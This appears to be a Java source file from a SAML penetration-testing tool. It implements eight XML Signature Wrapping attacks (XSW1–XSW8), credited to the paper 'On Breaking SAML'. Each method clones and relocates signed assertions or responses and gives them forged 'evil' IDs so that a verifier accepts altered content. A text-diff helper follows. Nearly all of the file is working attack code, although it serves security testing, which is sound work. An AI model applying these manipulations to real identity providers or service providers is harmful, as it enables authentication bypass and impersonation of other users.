XSWHelpers.java

package helpers;

import helpers.diff_match_patch.Diff;
import helpers.diff_match_patch.LinesToCharsResult;

import java.util.LinkedList;

import org.w3c.dom.Document;
import org.w3c.dom.Element;

public class XSWHelpers {

	public final static String[] xswTypes = {"XSW1", "XSW2", "XSW3", "XSW4", "XSW5", "XSW6", "XSW7", "XSW8"};
	
	/*
	 * Following are the 8 common XML Signature Wrapping attacks implemented, which were found
	 * in a paper called "On Breaking SAML: Be Whoever You Want to Be"
	 * We have also documented these attacks in our product documentation for further information
	 * 
	 * */
	
	public void applyXSW(String xswType, Document document){
		switch (xswType){
			case "XSW1":
				applyXSW1(document);
				break;
			case "XSW2":
				applyXSW2(document);
				break;
			case "XSW3":
				applyXSW3(document);
				break;
			case "XSW4":
				applyXSW4(document);
				break;
			case "XSW5":
				applyXSW5(document);
				break;
			case "XSW6":
				applyXSW6(document);
				break;
			case "XSW7":
				applyXSW7(document);
				break;
			case "XSW8":
				applyXSW8(document);
				break;
		}
	}
	
	
	public void applyXSW1(Document document){
		Element response = (Element) document.getElementsByTagNameNS("*", "Response").item(0);
		Element clonedResponse = (Element) response.cloneNode(true);
		Element clonedSignature = (Element) clonedResponse.getElementsByTagNameNS("*", "Signature").item(0);
		clonedResponse.removeChild(clonedSignature);
		Element signature = (Element) response.getElementsByTagNameNS("*", "Signature").item(0);
		signature.appendChild(clonedResponse);
		response.setAttribute("ID", "_evil_response_ID");
	}
	
	public void applyXSW2(Document document){
		Element response = (Element) document.getElementsByTagNameNS("*", "Response").item(0);
		Element clonedResponse = (Element) response.cloneNode(true);
		Element clonedSignature = (Element) clonedResponse.getElementsByTagNameNS("*", "Signature").item(0);
		clonedResponse.removeChild(clonedSignature);
		Element signature = (Element) response.getElementsByTagNameNS("*", "Signature").item(0);
		response.insertBefore(clonedResponse, signature);
		response.setAttribute("ID", "_evil_response_ID");
	}
	
	public void applyXSW3(Document document){
		Element assertion = (Element) document.getElementsByTagNameNS("*", "Assertion").item(0);
		Element evilAssertion = (Element) assertion.cloneNode(true);
		Element copiedSignature = (Element) evilAssertion.getElementsByTagNameNS("*", "Signature").item(0);
		evilAssertion.setAttribute("ID", "_evil_assertion_ID");
		evilAssertion.removeChild(copiedSignature);
		document.getDocumentElement().insertBefore(evilAssertion, assertion);
	}
	
	public void applyXSW4(Document document){
		Element assertion = (Element) document.getElementsByTagNameNS("*", "Assertion").item(0);
		Element evilAssertion = (Element) assertion.cloneNode(true);
		Element copiedSignature = (Element) evilAssertion.getElementsByTagNameNS("*", "Signature").item(0);
		evilAssertion.setAttribute("ID", "_evil_assertion_ID");
		evilAssertion.removeChild(copiedSignature);
		document.getDocumentElement().appendChild(evilAssertion);
		evilAssertion.appendChild(assertion);
	}
	
	public void applyXSW5(Document document){
		Element evilAssertion = (Element) document.getElementsByTagNameNS("*", "Assertion").item(0);
		Element assertion = (Element) evilAssertion.cloneNode(true);
		Element copiedSignature = (Element) assertion.getElementsByTagNameNS("*", "Signature").item(0);
		assertion.removeChild(copiedSignature);
		document.getDocumentElement().appendChild(assertion);
		evilAssertion.setAttribute("ID", "_evil_assertion_ID");
	}
	
	public void applyXSW6(Document document){
		Element evilAssertion = (Element) document.getElementsByTagNameNS("*", "Assertion").item(0);
		Element originalSignature = (Element) evilAssertion.getElementsByTagNameNS("*", "Signature").item(0);
		Element assertion = (Element) evilAssertion.cloneNode(true);
		Element copiedSignature = (Element) assertion.getElementsByTagNameNS("*", "Signature").item(0);
		assertion.removeChild(copiedSignature);
		originalSignature.appendChild(assertion);
		evilAssertion.setAttribute("ID", "_evil_assertion_ID");
	}

	public void applyXSW7(Document document){
		Element assertion = (Element) document.getElementsByTagNameNS("*", "Assertion").item(0);
		Element extensions = document.createElement("Extensions");
		document.getDocumentElement().insertBefore(extensions, assertion);
		Element evilAssertion = (Element) assertion.cloneNode(true);
		Element copiedSignature = (Element) evilAssertion.getElementsByTagNameNS("*", "Signature").item(0);
		evilAssertion.removeChild(copiedSignature);
		extensions.appendChild(evilAssertion);
	}
	
	public void applyXSW8(Document document){
		Element evilAssertion = (Element) document.getElementsByTagNameNS("*", "Assertion").item(0);
		Element originalSignature = (Element) evilAssertion.getElementsByTagNameNS("*", "Signature").item(0);
		Element assertion = (Element) evilAssertion.cloneNode(true);
		Element copiedSignature = (Element) assertion.getElementsByTagNameNS("*", "Signature").item(0);
		assertion.removeChild(copiedSignature);
		Element object = document.createElement("Object");
		originalSignature.appendChild(object);
		object.appendChild(assertion);
	}
	
	public String diffLineMode(String text1, String text2) {
		diff_match_patch differ = new diff_match_patch();
		differ.Diff_Timeout = 5;
		LinesToCharsResult result = differ.diff_linesToChars(text1, text2);

		LinkedList<Diff> diffs = differ.diff_main(result.chars1, result.chars2, false);
		differ.diff_charsToLines(diffs, result.lineArray);
		return differ.diff_prettyHtml(diffs);
	}
	
}